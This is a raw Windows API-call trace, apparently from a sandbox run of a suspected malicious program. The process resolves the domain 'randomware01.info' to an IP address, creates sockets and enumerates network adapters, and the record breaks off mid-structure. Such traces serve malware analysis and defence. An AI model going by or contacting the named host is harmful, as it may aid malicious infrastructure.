[0098.655] GetCurrentThreadId () returned 0xba4 [0098.655] ResetEvent (hEvent=0xb8) returned 1 [0098.655] GetCurrentThreadId () returned 0xba4 [0098.655] GetCurrentThreadId () returned 0xba4 [0098.655] SetEvent (hEvent=0xbc) returned 1 [0098.655] SetEvent (hEvent=0xb8) returned 1 [0098.655] CloseHandle (hObject=0x3d4) returned 1 [0098.739] GetCurrentThreadId () returned 0xba4 [0098.739] ResetEvent (hEvent=0xb8) returned 1 [0098.739] GetCurrentThreadId () returned 0xba4 [0098.739] GetCurrentThreadId () returned 0xba4 [0098.739] GetCurrentThreadId () returned 0xba4 [0098.739] GetCurrentThreadId () returned 0xba4 [0098.739] ResetEvent (hEvent=0xb8) returned 1 [0098.739] GetCurrentThreadId () returned 0xba4 [0098.739] GetCurrentThreadId () returned 0xba4 [0098.739] SetEvent (hEvent=0xbc) returned 1 [0098.739] SetEvent (hEvent=0xb8) returned 1 [0098.739] CloseHandle (hObject=0x3d0) returned 1 [0099.152] FreeAddrInfoW (pAddrInfo=0x5b64958*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="randomware01.info", ai_addr=0x5b64980*(sa_family=2, sin_port=0x0, sin_addr="95.217.137.242"), ai_next=0x0)) [0099.155] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x3d4 [0099.155] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3e0 [0099.155] ioctlsocket (in: s=0x3d4, cmd=-2147195266, argp=0x41e9a0 | out: argp=0x41e9a0) returned 0 [0099.155] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x3e4 [0099.156] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3e8 [0099.156] ioctlsocket (in: s=0x3e4, cmd=-2147195266, argp=0x41e9a0 | out: argp=0x41e9a0) returned 0 [0099.156] WSAIoctl (in: s=0x3d4, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x41e988, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x41e988, lpOverlapped=0x0) returned -1 [0099.156] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x41e6b8, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0099.156] WSAEventSelect (s=0x3d4, hEventObject=0x3e0, lNetworkEvents=512) returned 0 [0099.156] WSAIoctl (in: s=0x3e4, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x41e988, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x41e988, lpOverlapped=0x0) returned -1 [0099.156] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x41e6b8, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0099.156] WSAEventSelect (s=0x3e4, hEventObject=0x3e8, lNetworkEvents=512) returned 0 [0099.157] GetProcAddress (hModule=0x74810000, lpProcName="GetAdaptersAddresses") returned 0x74816a4d [0099.157] GetAdaptersAddresses (in: Family=0x0, Flags=0x2e, Reserved=0x0, AdapterAddresses=0x0, SizePointer=0x41e984*=0x0 | out: AdapterAddresses=0x0, SizePointer=0x41e984*=0xa5c) returned 0x6f [0099.157] GetCurrentThreadId () returned 0xba4 [0099.157] ResetEvent (hEvent=0xb8) returned 1 [0099.157] GetCurrentThreadId () returned 0xba4 [0099.157] GetCurrentThreadId () returned 0xba4 [0099.157] GetCurrentThreadId () returned 0xba4 [0099.157] GetCurrentThreadId () returned 0xba4 [0099.157] ResetEvent (hEvent=0xb8) returned 1 [0099.157] GetCurrentThreadId () returned 0xba4 [0099.157] GetCurrentThreadId () returned 0xba4 [0099.157] SetEvent (hEvent=0xbc) returned 1 [0099.157] SetEvent (hEvent=0xb8) returned 1 [0099.157] CloseHandle (hObject=0x3ec) returned 1 [0099.158] GetCurrentThreadId () returned 0xba4 [0099.158] ResetEvent (hEvent=0xb8) returned 1 [0099.158] GetCurrentThreadId () returned 0xba4 [0099.158] GetCurrentThreadId () returned 0xba4 [0099.158] GetCurrentThreadId () returned 0xba4 [0099.158] GetCurrentThreadId () returned 0xba4 [0099.158] ResetEvent (hEvent=0xb8) returned 1 [0099.158] GetCurrentThreadId () returned 0xba4 [0099.158] GetCurrentThreadId () returned 0xba4 [0099.159] SetEvent (hEvent=0xbc) returned 1 [0099.159] SetEvent (hEvent=0xb8) returned 1 [0099.159] CloseHandle (hObject=0x3ec) returned 1 [0099.159] GetCurrentThreadId () returned 0xba4 [0099.159] ResetEvent (hEvent=0xb8) returned 1 [0099.159] GetCurrentThreadId () returned 0xba4 [0099.159] GetCurrentThreadId () returned 0xba4 [0099.159] GetCurrentThreadId () returned 0xba4 [0099.159] GetCurrentThreadId () returned 0xba4 [0099.159] ResetEvent (hEvent=0xb8) returned 1 [0099.159] GetCurrentThreadId () returned 0xba4 [0099.159] GetCurrentThreadId () returned 0xba4 [0099.159] SetEvent (hEvent=0xbc) returned 1 [0099.159] SetEvent (hEvent=0xb8) returned 1 [0099.159] CloseHandle (hObject=0x3ec) returned 1 [0099.159] GetCurrentThreadId () returned 0xba4 [0099.159] ResetEvent (hEvent=0xb8) returned 1 [0099.159] GetCurrentThreadId () returned 0xba4 [0099.159] GetCurrentThreadId () returned 0xba4 [0099.159] GetCurrentThreadId () returned 0xba4 [0099.159] GetCurrentThreadId () returned 0xba4 [0099.159] ResetEvent (hEvent=0xb8) returned 1 [0099.160] GetCurrentThreadId () returned 0xba4 [0099.160] GetCurrentThreadId () returned 0xba4 [0099.160] SetEvent (hEvent=0xbc) returned 1 [0099.160] SetEvent (hEvent=0xb8) returned 1 [0099.160] CloseHandle (hObject=0x3ec) returned 1 [0099.160] GetCurrentThreadId () returned 0xba4 [0099.160] ResetEvent (hEvent=0xb8) returned 1 [0099.160] GetCurrentThreadId () returned 0xba4 [0099.160] GetCurrentThreadId () returned 0xba4 [0099.160] GetCurrentThreadId () returned 0xba4 [0099.160] GetCurrentThreadId () returned 0xba4 [0099.160] ResetEvent (hEvent=0xb8) returned 1 [0099.160] GetCurrentThreadId () returned 0xba4 [0099.160] GetCurrentThreadId () returned 0xba4 [0099.160] SetEvent (hEvent=0xbc) returned 1 [0099.160] SetEvent (hEvent=0xb8) returned 1 [0099.160] CloseHandle (hObject=0x3ec) returned 1 [0099.160] GetCurrentThreadId () returned 0xba4 [0099.160] ResetEvent (hEvent=0xb8) returned 1 [0099.160] GetCurrentThreadId () returned 0xba4 [0099.160] GetCurrentThreadId () returned 0xba4 [0099.160] GetCurrentThreadId () returned 0xba4 [0099.160] GetCurrentThreadId () returned 0xba4 [0099.160] ResetEvent (hEvent=0xb8) returned 1 [0099.160] GetCurrentThreadId () returned 0xba4 [0099.161] GetCurrentThreadId () returned 0xba4 [0099.161] SetEvent (hEvent=0xbc) returned 1 [0099.161] SetEvent (hEvent=0xb8) returned 1 [0099.161] CloseHandle (hObject=0x3ec) returned 1 [0099.161] GetCurrentThreadId () returned 0xba4 [0099.161] ResetEvent (hEvent=0xb8) returned 1 [0099.161] GetCurrentThreadId () returned 0xba4 [0099.161] GetCurrentThreadId () returned 0xba4 [0099.161] GetCurrentThreadId () returned 0xba4 [0099.161] GetCurrentThreadId () returned 0xba4 [0099.161] ResetEvent (hEvent=0xb8) returned 1 [0099.161] GetCurrentThreadId () returned 0xba4 [0099.161] GetCurrentThreadId () returned 0xba4 [0099.161] SetEvent (hEvent=0xbc) returned 1 [0099.161] SetEvent (hEvent=0xb8) returned 1 [0099.161] CloseHandle (hObject=0x3ec) returned 1 [0099.161] GetCurrentThreadId () returned 0xba4 [0099.161] ResetEvent (hEvent=0xb8) returned 1 [0099.161] GetCurrentThreadId () returned 0xba4 [0099.161] GetCurrentThreadId () returned 0xba4 [0099.161] GetCurrentThreadId () returned 0xba4 [0099.161] GetCurrentThreadId () returned 0xba4 [0099.161] ResetEvent (hEvent=0xb8) returned 1 [0099.161] GetCurrentThreadId () returned 0xba4 [0099.161] GetCurrentThreadId () returned 0xba4 [0099.161] SetEvent (hEvent=0xbc) returned 1 [0099.162] SetEvent (hEvent=0xb8) returned 1 [0099.162] CloseHandle (hObject=0x3ec) returned 1 [0099.162] GetCurrentThreadId () returned 0xba4 [0099.162] ResetEvent (hEvent=0xb8) returned 1 [0099.162] GetCurrentThreadId () returned 0xba4 [0099.162] GetCurrentThreadId () returned 0xba4 [0099.162] GetCurrentThreadId () returned 0xba4 [0099.162] GetCurrentThreadId () returned 0xba4 [0099.162] ResetEvent (hEvent=0xb8) returned 1 [0099.162] GetCurrentThreadId () returned 0xba4 [0099.162] GetCurrentThreadId () returned 0xba4 [0099.162] SetEvent (hEvent=0xbc) returned 1 [0099.162] SetEvent (hEvent=0xb8) returned 1 [0099.162] CloseHandle (hObject=0x3ec) returned 1 [0099.162] GetCurrentThreadId () returned 0xba4 [0099.162] ResetEvent (hEvent=0xb8) returned 1 [0099.162] GetCurrentThreadId () returned 0xba4 [0099.162] GetCurrentThreadId () returned 0xba4 [0099.162] GetCurrentThreadId () returned 0xba4 [0099.162] GetCurrentThreadId () returned 0xba4 [0099.162] ResetEvent (hEvent=0xb8) returned 1 [0099.162] GetCurrentThreadId () returned 0xba4 [0099.162] GetCurrentThreadId () returned 0xba4 [0099.162] SetEvent (hEvent=0xbc) returned 1 [0099.162] SetEvent (hEvent=0xb8) returned 1 [0099.162] CloseHandle (hObject=0x3ec) returned 1 [0099.163] GetCurrentThreadId () returned 0xba4 [0099.163] ResetEvent (hEvent=0xb8) returned 1 [0099.163] GetCurrentThreadId () returned 0xba4 [0099.163] GetCurrentThreadId () returned 0xba4 [0099.163] GetCurrentThreadId () returned 0xba4 [0099.163] GetCurrentThreadId () returned 0xba4 [0099.163] ResetEvent (hEvent=0xb8) returned 1 [0099.163] GetCurrentThreadId () returned 0xba4 [0099.163] GetCurrentThreadId () returned 0xba4 [0099.163] SetEvent (hEvent=0xbc) returned 1 [0099.163] SetEvent (hEvent=0xb8) returned 1 [0099.163] CloseHandle (hObject=0x3ec) returned 1 [0099.163] GetCurrentThreadId () returned 0xba4 [0099.163] ResetEvent (hEvent=0xb8) returned 1 [0099.163] GetCurrentThreadId () returned 0xba4 [0099.163] GetCurrentThreadId () returned 0xba4 [0099.163] GetCurrentThreadId () returned 0xba4 [0099.163] GetCurrentThreadId () returned 0xba4 [0099.163] ResetEvent (hEvent=0xb8) returned 1 [0099.163] GetCurrentThreadId () returned 0xba4 [0099.163] GetCurrentThreadId () returned 0xba4 [0099.163] SetEvent (hEvent=0xbc) returned 1 [0099.163] SetEvent (hEvent=0xb8) returned 1 [0099.163] CloseHandle (hObject=0x3ec) returned 1 [0099.163] GetCurrentThreadId () returned 0xba4 [0099.163] ResetEvent (hEvent=0xb8) returned 1 [0099.164] GetCurrentThreadId () returned 0xba4 [0099.164] GetCurrentThreadId () returned 0xba4 [0099.164] GetCurrentThreadId () returned 0xba4 [0099.164] GetCurrentThreadId () returned 0xba4 [0099.164] ResetEvent (hEvent=0xb8) returned 1 [0099.164] GetCurrentThreadId () returned 0xba4 [0099.164] GetCurrentThreadId () returned 0xba4 [0099.164] SetEvent (hEvent=0xbc) returned 1 [0099.164] SetEvent (hEvent=0xb8) returned 1 [0099.164] CloseHandle (hObject=0x3ec) returned 1 [0099.164] GetCurrentThreadId () returned 0xba4 [0099.164] ResetEvent (hEvent=0xb8) returned 1 [0099.164] GetCurrentThreadId () returned 0xba4 [0099.164] GetCurrentThreadId () returned 0xba4 [0099.164] GetCurrentThreadId () returned 0xba4 [0099.164] GetCurrentThreadId () returned 0xba4 [0099.164] ResetEvent (hEvent=0xb8) returned 1 [0099.164] GetCurrentThreadId () returned 0xba4 [0099.164] GetCurrentThreadId () returned 0xba4 [0099.164] SetEvent (hEvent=0xbc) returned 1 [0099.164] SetEvent (hEvent=0xb8) returned 1 [0099.164] CloseHandle (hObject=0x3ec) returned 1 [0099.164] GetCurrentThreadId () returned 0xba4 [0099.164] ResetEvent (hEvent=0xb8) returned 1 [0099.164] GetCurrentThreadId () returned 0xba4 [0099.164] GetCurrentThreadId () returned 0xba4 [0099.164] GetCurrentThreadId () returned 0xba4 [0099.165] GetCurrentThreadId () returned 0xba4 [0099.165] ResetEvent (hEvent=0xb8) returned 1 [0099.165] GetCurrentThreadId () returned 0xba4 [0099.165] GetCurrentThreadId () returned 0xba4 [0099.165] SetEvent (hEvent=0xbc) returned 1 [0099.165] SetEvent (hEvent=0xb8) returned 1 [0099.165] CloseHandle (hObject=0x3ec) returned 1 [0099.165] GetCurrentThreadId () returned 0xba4 [0099.165] ResetEvent (hEvent=0xb8) returned 1 [0099.165] GetCurrentThreadId () returned 0xba4 [0099.165] GetCurrentThreadId () returned 0xba4 [0099.165] GetCurrentThreadId () returned 0xba4 [0099.165] GetCurrentThreadId () returned 0xba4 [0099.165] ResetEvent (hEvent=0xb8) returned 1 [0099.165] GetCurrentThreadId () returned 0xba4 [0099.165] GetCurrentThreadId () returned 0xba4 [0099.165] SetEvent (hEvent=0xbc) returned 1 [0099.165] SetEvent (hEvent=0xb8) returned 1 [0099.165] CloseHandle (hObject=0x3ec) returned 1 [0099.165] GetCurrentThreadId () returned 0xba4 [0099.165] ResetEvent (hEvent=0xb8) returned 1 [0099.165] GetCurrentThreadId () returned 0xba4 [0099.165] GetCurrentThreadId () returned 0xba4 [0099.165] GetCurrentThreadId () returned 0xba4 [0099.165] GetCurrentThreadId () returned 0xba4 [0099.165] ResetEvent (hEvent=0xb8) returned 1 [0099.166] GetCurrentThreadId () returned 0xba4 [0099.166] GetCurrentThreadId () returned 0xba4 [0099.166] SetEvent (hEvent=0xbc) returned 1 [0099.166] SetEvent (hEvent=0xb8) returned 1 [0099.166] CloseHandle (hObject=0x3ec) returned 1 [0099.166] GetCurrentThreadId () returned 0xba4 [0099.166] ResetEvent (hEvent=0xb8) returned 1 [0099.166] GetCurrentThreadId () returned 0xba4 [0099.166] GetCurrentThreadId () returned 0xba4 [0099.166] GetCurrentThreadId () returned 0xba4 [0099.166] GetCurrentThreadId () returned 0xba4 [0099.166] ResetEvent (hEvent=0xb8) returned 1 [0099.166] GetCurrentThreadId () returned 0xba4 [0099.166] GetCurrentThreadId () returned 0xba4 [0099.166] SetEvent (hEvent=0xbc) returned 1 [0099.166] SetEvent (hEvent=0xb8) returned 1 [0099.166] CloseHandle (hObject=0x3ec) returned 1 [0099.166] GetCurrentThreadId () returned 0xba4 [0099.166] ResetEvent (hEvent=0xb8) returned 1 [0099.167] GetCurrentThreadId () returned 0xba4 [0099.167] GetCurrentThreadId () returned 0xba4 [0099.167] GetCurrentThreadId () returned 0xba4 [0099.167] GetCurrentThreadId () returned 0xba4 [0099.167] ResetEvent (hEvent=0xb8) returned 1 [0099.167] GetCurrentThreadId () returned 0xba4 [0099.167] GetCurrentThreadId () returned 0xba4 [0099.167] SetEvent (hEvent=0xbc) returned 1 [0099.167] SetEvent (hEvent=0xb8) returned 1 [0099.167] CloseHandle (hObject=0x3ec) returned 1 [0099.168] GetCurrentThreadId () returned 0xba4 [0099.168] ResetEvent (hEvent=0xb8) returned 1 [0099.168] GetCurrentThreadId () returned 0xba4 [0099.168] GetCurrentThreadId () returned 0xba4 [0099.168] GetCurrentThreadId () returned 0xba4 [0099.168] GetCurrentThreadId () returned 0xba4 [0099.168] ResetEvent (hEvent=0xb8) returned 1 [0099.168] GetCurrentThreadId () returned 0xba4 [0099.168] GetCurrentThreadId () returned 0xba4 [0099.168] SetEvent (hEvent=0xbc) returned 1 [0099.168] SetEvent (hEvent=0xb8) returned 1 [0099.168] CloseHandle (hObject=0x3f0) returned 1 [0099.169] GetCurrentThreadId () returned 0xba4 [0099.169] ResetEvent (hEvent=0xb8) returned 1 [0099.169] GetCurrentThreadId () returned 0xba4 [0099.169] GetCurrentThreadId () returned 0xba4 [0099.169] GetCurrentThreadId () returned 0xba4 [0099.169] GetCurrentThreadId () returned 0xba4 [0099.169] ResetEvent (hEvent=0xb8) returned 1 [0099.170] GetCurrentThreadId () returned 0xba4 [0099.170] GetCurrentThreadId () returned 0xba4 [0099.170] SetEvent (hEvent=0xbc) returned 1 [0099.170] SetEvent (hEvent=0xb8) returned 1 [0099.170] CloseHandle (hObject=0x3f0) returned 1 [0099.170] GetCurrentThreadId () returned 0xba4 [0099.170] ResetEvent (hEvent=0xb8) returned 1 [0099.170] GetCurrentThreadId () returned 0xba4 [0099.170] GetCurrentThreadId () returned 0xba4 [0099.170] GetCurrentThreadId () returned 0xba4 [0099.170] GetCurrentThreadId () returned 0xba4 [0099.170] ResetEvent (hEvent=0xb8) returned 1 [0099.170] GetCurrentThreadId () returned 0xba4 [0099.170] GetCurrentThreadId () returned 0xba4 [0099.170] SetEvent (hEvent=0xbc) returned 1 [0099.170] SetEvent (hEvent=0xb8) returned 1 [0099.170] CloseHandle (hObject=0x3f0) returned 1 [0099.170] GetCurrentThreadId () returned 0xba4 [0099.170] ResetEvent (hEvent=0xb8) returned 1 [0099.170] GetCurrentThreadId () returned 0xba4 [0099.170] GetCurrentThreadId () returned 0xba4 [0099.170] GetCurrentThreadId () returned 0xba4 [0099.171] GetCurrentThreadId () returned 0xba4 [0099.171] ResetEvent (hEvent=0xb8) returned 1 [0099.171] GetCurrentThreadId () returned 0xba4 [0099.171] GetCurrentThreadId () returned 0xba4 [0099.171] SetEvent (hEvent=0xbc) returned 1 [0099.171] SetEvent (hEvent=0xb8) returned 1 [0099.171] CloseHandle (hObject=0x3f0) returned 1 [0099.171] GetCurrentThreadId () returned 0xba4 [0099.171] ResetEvent (hEvent=0xb8) returned 1 [0099.171] GetCurrentThreadId () returned 0xba4 [0099.171] GetCurrentThreadId () returned 0xba4 [0099.171] GetCurrentThreadId () returned 0xba4 [0099.171] GetCurrentThreadId () returned 0xba4 [0099.171] ResetEvent (hEvent=0xb8) returned 1 [0099.171] GetCurrentThreadId () returned 0xba4 [0099.171] GetCurrentThreadId () returned 0xba4 [0099.171] SetEvent (hEvent=0xbc) returned 1 [0099.171] SetEvent (hEvent=0xb8) returned 1 [0099.171] CloseHandle (hObject=0x3f0) returned 1 [0099.171] GetCurrentThreadId () returned 0xba4 [0099.171] ResetEvent (hEvent=0xb8) returned 1 [0099.172] GetCurrentThreadId () returned 0xba4 [0099.172] GetCurrentThreadId () returned 0xba4 [0099.172] GetCurrentThreadId () returned 0xba4 [0099.172] GetCurrentThreadId () returned 0xba4 [0099.172] ResetEvent (hEvent=0xb8) returned 1 [0099.172] GetCurrentThreadId () returned 0xba4 [0099.172] GetCurrentThreadId () returned 0xba4 [0099.172] SetEvent (hEvent=0xbc) returned 1 [0099.172] SetEvent (hEvent=0xb8) returned 1 [0099.172] CloseHandle (hObject=0x3f0) returned 1 [0099.172] GetCurrentThreadId () returned 0xba4 [0099.172] ResetEvent (hEvent=0xb8) returned 1 [0099.172] GetCurrentThreadId () returned 0xba4 [0099.172] GetCurrentThreadId () returned 0xba4 [0099.172] GetCurrentThreadId () returned 0xba4 [0099.172] GetCurrentThreadId () returned 0xba4 [0099.172] ResetEvent (hEvent=0xb8) returned 1 [0099.172] GetCurrentThreadId () returned 0xba4 [0099.172] GetCurrentThreadId () returned 0xba4 [0099.172] SetEvent (hEvent=0xbc) returned 1 [0099.172] SetEvent (hEvent=0xb8) returned 1 [0099.173] CloseHandle (hObject=0x3f0) returned 1 [0099.173] GetCurrentThreadId () returned 0xba4 [0099.173] ResetEvent (hEvent=0xb8) returned 1 [0099.173] GetCurrentThreadId () returned 0xba4 [0099.173] GetCurrentThreadId () returned 0xba4 [0099.173] GetCurrentThreadId () returned 0xba4 [0099.173] GetCurrentThreadId () returned 0xba4 [0099.173] ResetEvent (hEvent=0xb8) returned 1 [0099.173] GetCurrentThreadId () returned 0xba4 [0099.173] GetCurrentThreadId () returned 0xba4 [0099.173] SetEvent (hEvent=0xbc) returned 1 [0099.173] SetEvent (hEvent=0xb8) returned 1 [0099.173] CloseHandle (hObject=0x3f0) returned 1 [0099.173] GetCurrentThreadId () returned 0xba4 [0099.173] ResetEvent (hEvent=0xb8) returned 1 [0099.173] GetCurrentThreadId () returned 0xba4 [0099.173] GetCurrentThreadId () returned 0xba4 [0099.173] GetCurrentThreadId () returned 0xba4 [0099.174] GetCurrentThreadId () returned 0xba4 [0099.174] ResetEvent (hEvent=0xb8) returned 1 [0099.174] GetCurrentThreadId () returned 0xba4 [0099.174] GetCurrentThreadId () returned 0xba4 [0099.174] SetEvent (hEvent=0xbc) returned 1 [0099.174] SetEvent (hEvent=0xb8) returned 1 [0099.174] CloseHandle (hObject=0x3f0) returned 1 [0099.174] GetCurrentThreadId () returned 0xba4 [0099.174] ResetEvent (hEvent=0xb8) returned 1 [0099.174] GetCurrentThreadId () returned 0xba4 [0099.174] GetCurrentThreadId () returned 0xba4 [0099.174] GetCurrentThreadId () returned 0xba4 [0099.174] GetCurrentThreadId () returned 0xba4 [0099.174] ResetEvent (hEvent=0xb8) returned 1 [0099.174] GetCurrentThreadId () returned 0xba4 [0099.174] GetCurrentThreadId () returned 0xba4 [0099.175] SetEvent (hEvent=0xbc) returned 1 [0099.175] SetEvent (hEvent=0xb8) returned 1 [0099.175] CloseHandle (hObject=0x3f0) returned 1 [0099.175] GetCurrentThreadId () returned 0xba4 [0099.175] ResetEvent (hEvent=0xb8) returned 1 [0099.175] GetCurrentThreadId () returned 0xba4 [0099.175] GetCurrentThreadId () returned 0xba4 [0099.175] GetCurrentThreadId () returned 0xba4 [0099.175] GetCurrentThreadId () returned 0xba4 [0099.175] ResetEvent (hEvent=0xb8) returned 1 [0099.175] GetCurrentThreadId () returned 0xba4 [0099.175] GetCurrentThreadId () returned 0xba4 [0099.175] SetEvent (hEvent=0xbc) returned 1 [0099.175] SetEvent (hEvent=0xb8) returned 1 [0099.175] CloseHandle (hObject=0x3f0) returned 1 [0099.176] GetCurrentThreadId () returned 0xba4 [0099.176] ResetEvent (hEvent=0xb8) returned 1 [0099.176] GetCurrentThreadId () returned 0xba4 [0099.176] GetCurrentThreadId () returned 0xba4 [0099.176] GetCurrentThreadId () returned 0xba4 [0099.176] GetCurrentThreadId () returned 0xba4 [0099.176] ResetEvent (hEvent=0xb8) returned 1 [0099.176] GetCurrentThreadId () returned 0xba4 [0099.176] GetCurrentThreadId () returned 0xba4 [0099.176] SetEvent (hEvent=0xbc) returned 1 [0099.176] SetEvent (hEvent=0xb8) returned 1 [0099.176] CloseHandle (hObject=0x3ec) returned 1 [0099.177] GetCurrentThreadId () returned 0xba4 [0099.177] ResetEvent (hEvent=0xb8) returned 1 [0099.177] GetCurrentThreadId () returned 0xba4 [0099.177] GetCurrentThreadId () returned 0xba4 [0099.177] GetCurrentThreadId () returned 0xba4 [0099.177] GetCurrentThreadId () returned 0xba4 [0099.177] ResetEvent (hEvent=0xb8) returned 1 [0099.177] GetCurrentThreadId () returned 0xba4 [0099.177] GetCurrentThreadId () returned 0xba4 [0099.177] SetEvent (hEvent=0xbc) returned 1 [0099.177] SetEvent (hEvent=0xb8) returned 1 [0099.177] CloseHandle (hObject=0x3ec) returned 1 [0099.177] GetCurrentThreadId () returned 0xba4 [0099.177] ResetEvent (hEvent=0xb8) returned 1 [0099.177] GetCurrentThreadId () returned 0xba4 [0099.177] GetCurrentThreadId () returned 0xba4 [0099.178] GetCurrentThreadId () returned 0xba4 [0099.178] GetCurrentThreadId () returned 0xba4 [0099.178] ResetEvent (hEvent=0xb8) returned 1 [0099.178] GetCurrentThreadId () returned 0xba4 [0099.178] GetCurrentThreadId () returned 0xba4 [0099.178] SetEvent (hEvent=0xbc) returned 1 [0099.178] SetEvent (hEvent=0xb8) returned 1 [0099.178] CloseHandle (hObject=0x3ec) returned 1 [0099.178] GetCurrentThreadId () returned 0xba4 [0099.178] ResetEvent (hEvent=0xb8) returned 1 [0099.178] GetCurrentThreadId () returned 0xba4 [0099.178] GetCurrentThreadId () returned 0xba4 [0099.178] GetCurrentThreadId () returned 0xba4 [0099.178] GetCurrentThreadId () returned 0xba4 [0099.178] ResetEvent (hEvent=0xb8) returned 1 [0099.178] GetCurrentThreadId () returned 0xba4 [0099.178] GetCurrentThreadId () returned 0xba4 [0099.178] SetEvent (hEvent=0xbc) returned 1 [0099.178] SetEvent (hEvent=0xb8) returned 1 [0099.178] CloseHandle (hObject=0x3ec) returned 1 [0099.178] GetCurrentThreadId () returned 0xba4 [0099.178] ResetEvent (hEvent=0xb8) returned 1 [0099.179] GetCurrentThreadId () returned 0xba4 [0099.179] GetCurrentThreadId () returned 0xba4 [0099.179] GetCurrentThreadId () returned 0xba4 [0099.179] GetCurrentThreadId () returned 0xba4 [0099.179] ResetEvent (hEvent=0xb8) returned 1 [0099.179] GetCurrentThreadId () returned 0xba4 [0099.179] GetCurrentThreadId () returned 0xba4 [0099.179] SetEvent (hEvent=0xbc) returned 1 [0099.179] SetEvent (hEvent=0xb8) returned 1 [0099.179] CloseHandle (hObject=0x3ec) returned 1 [0099.179] GetCurrentThreadId () returned 0xba4 [0099.179] ResetEvent (hEvent=0xb8) returned 1 [0099.179] GetCurrentThreadId () returned 0xba4 [0099.179] GetCurrentThreadId () returned 0xba4 [0099.179] GetCurrentThreadId () returned 0xba4 [0099.181] LocalAlloc (uFlags=0x0, uBytes=0xa5c) returned 0x759d20 [0099.181] GetAdaptersAddresses (in: Family=0x0, Flags=0x2e, Reserved=0x0, AdapterAddresses=0x759d20, SizePointer=0x41e984*=0xa5c | out: AdapterAddresses=0x759d20*(Alignment=0xe00000178, Length=0x178, IfIndex=0xe, Next=0x759fe4, AdapterName="{208C2C2F-ECA0-4B34-8C2D-83B1FBC25E0D}", FirstUnicastAddress=0x759f58, FirstAnycastAddress=0x0, FirstMulticastAddress=0x0, FirstDnsServerAddress=0x0, DnsSuffix="", Description="Intel(R) PRO/1000 MT Network Connection #2", FriendlyName="Local Area Connection 2", PhysicalAddress=([0]=0x0, [1]=0x1, [2]=0x96, [3]=0x44, [4]=0xa5, [5]=0xb3, [6]=0x0, [7]=0x0), PhysicalAddressLength=0x6, Flags=0x3e5, DdnsEnabled=0x3e5, RegisterAdapterSuffix=0x3e5, Dhcpv4Enabled=0x3e5, ReceiveOnly=0x3e5, NoMulticast=0x3e5, Ipv6OtherStatefulConfig=0x3e5, NetbiosOverTcpipEnabled=0x3e5, Ipv4Enabled=0x3e5, Ipv6Enabled=0x3e5, Ipv6ManagedAddressConfigurationSupported=0x3e5, Mtu=0x5dc, IfType=0x6, OperStatus=0x1, Ipv6IfIndex=0xe, ZoneIndices=([0]=0xe, [1]=0xe, [2]=0xe, [3]=0xe, [4]=0x1, [5]=0x1, [6]=0x1, [7]=0x1, [8]=0x1, [9]=0x1, [10]=0x1, [11]=0x1, [12]=0x1, [13]=0x1, [14]=0x0, [15]=0x1), FirstPrefix=0x0, TransmitLinkSpeed=0x3b9aca00, ReceiveLinkSpeed=0x3b9aca00, FirstWinsServerAddress=0x0, FirstGatewayAddress=0x0, Ipv4Metric=0xa, Ipv6Metric=0xa, Luid=0x6000007000000, Dhcpv4Server.lpSockaddr=0x759e98*(sa_family=2, sin_port=0x0, sin_addr="192.168.0.1"), Dhcpv4Server.iSockaddrLength=16, CompartmentId=0x1, NetworkGuid=0x11de7039846ee341, ConnectionType=0x1, TunnelType=0x0, Dhcpv6Server.lpSockaddr=0x0, Dhcpv6Server.iSockaddrLength=0, Dhcpv6ClientDuid=([0]=0x0, [1]=0x1, [2]=0x0, [3]=0x1, [4]=0x20, [5]=0xc7, [6]=0x5c, [7]=0xa7, [8]=0xc4, [9]=0x3d, [10]=0xc7, [11]=0x58, [12]=0x4a, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, 